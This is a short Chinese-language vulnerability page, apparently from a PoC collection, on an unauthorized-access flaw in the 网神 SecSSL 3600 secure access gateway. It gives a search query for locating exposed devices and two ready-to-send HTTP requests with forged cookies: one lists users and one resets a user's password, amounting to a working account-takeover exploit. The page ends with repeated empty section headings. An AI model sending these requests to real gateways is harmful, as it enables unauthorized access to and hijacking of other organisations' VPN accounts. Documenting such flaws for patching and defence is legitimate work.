网神 SecSSL 3600安全接入网关系统未授权访问漏洞¶

漏洞描述¶

网神 SecSSL 3600安全接入网关系统存在未授权访问漏洞，攻击者通过漏洞可以获取用户列表，并修改用户账号密码

漏洞影响¶

网神 SecSSL 3600安全接入网关系统

网络测绘¶

app="安全接入网关SecSSLVPN"

漏洞复现¶

登陆页面

验证POC，获取用户列表zkec

GET /admin/group/x_group.php?id=2

Cookie: admin_id=1; gw_admin_ticket=1;

修改用户密码

POST /changepass.php?type=2 

Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":"ceshi","subAuthId":"1"}
old_pass=&password=Asd123!@#123A&repassword=Asd123!@#123A

网神 SecSSL 3600安全接入网关系统 未授权访问漏洞¶

漏洞描述¶

漏洞影响¶

网络测绘¶

漏洞复现¶

网神 SecSSL 3600安全接入网关系统未授权访问漏洞¶